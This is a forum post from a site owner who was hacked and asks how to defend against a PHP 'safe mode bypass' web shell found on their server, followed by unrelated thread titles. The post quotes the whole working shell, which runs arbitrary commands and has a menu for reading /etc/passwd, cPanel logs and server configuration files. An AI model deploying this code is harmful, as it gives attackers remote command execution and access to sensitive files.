I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
getAlexaRank($url) function not working
I have made a function to get alexa rankthe site is here: http://mytestsite.rack111.com/1but the Alexa rank is showing up blank and I dont know why can someone please tell me if there is something
Multiple PHP errors when clicking a link..and..removing a ghost..
Hi - I have 2 problems with a new website - homeswapvacations.com, which I need help solving.The first problem - In the left column (on all pages) is "Featured Listing" column (in the admin
if else problem, help please
i have this script that i made only i try to also put in a if else for for some reason the script is not putting out the else echo. its not really a problem as the script works but it would be nice to
first id from db not showing
I have a php script which displays the content of a mysql table as a html table with sorting, delete/update button, etc. the problem is I can't make it show the first value inserted in the db, it only
Login Script Issues
I am using a script I got from http://phpsense.com/php/php-login-script.html in order to allow people to login but prevent multiple logins with the same username. Everything appears to work fine
help with contest script
I would like to code a contest script to my site but i don't know how. Could someone just give me push in the right direction?
Loops and Classes
I am making a template system and everything seems to be going well up until I have to loop in a variable where things starts to go weird. I need ideas on how to solve this.It is not picking up
Help me with some material on Open Text Overview.
Hi Experts,
What do you call the "token" thing?
You know how some sites have links that run on tokens? Tokens are links that only stay alive for a certain amount of time (1 use, 1 day, 1 week, etc).Can someone explain to me what exactly it's
PO Release Strategy Issue
Hi Experts,
